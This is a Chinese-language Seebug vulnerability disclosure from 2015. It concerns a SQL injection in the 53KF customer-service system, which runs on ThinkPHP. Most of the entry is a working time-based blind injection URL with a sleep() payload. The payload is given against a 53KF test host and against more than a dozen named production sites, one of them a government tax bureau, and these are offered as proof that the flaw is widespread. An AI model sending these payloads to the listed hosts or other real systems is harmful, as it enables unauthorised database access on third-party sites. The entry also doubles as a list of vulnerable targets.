53KF客服系统通用注入(thinkphp案例)

2015-05-19T00:00:00
ID SSV:94361
Type seebug
Reporter Root
Modified 2015-05-19T00:00:00

Description

简要描述:

thinkphp 框架注入.

详细说明:

WooYun: ThinkPHP最新版本SQL注入漏洞 延时注入: http://test2.53kf.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id[0]==-1%20or%201!=sleep(1)))limit%201%23between

漏洞证明:

很多企业都使用此客服系统:

恒生电子 http://webcall7.hundsun.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id[0]==-1%20or%201!=sleep(1)))limit%201%23between 北京汽车 http://kf02.baicmotorsales.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id[0]==-1%20or%201!=sleep(1)))limit%201%23between http://csuser.jia.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1 http://cs.ub8kf.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1 http://kf2.js-l-tax.gov.cn/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1 http://lm.hzlomo.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1 http://oc2.xiaoma.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1 http://kf2.immivip.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1 http://kffz.wanlitong.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1 http://talk.kefu.ehaoyao.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1 http://talk.3861520.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1 http://kf2.haoaigou.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id=1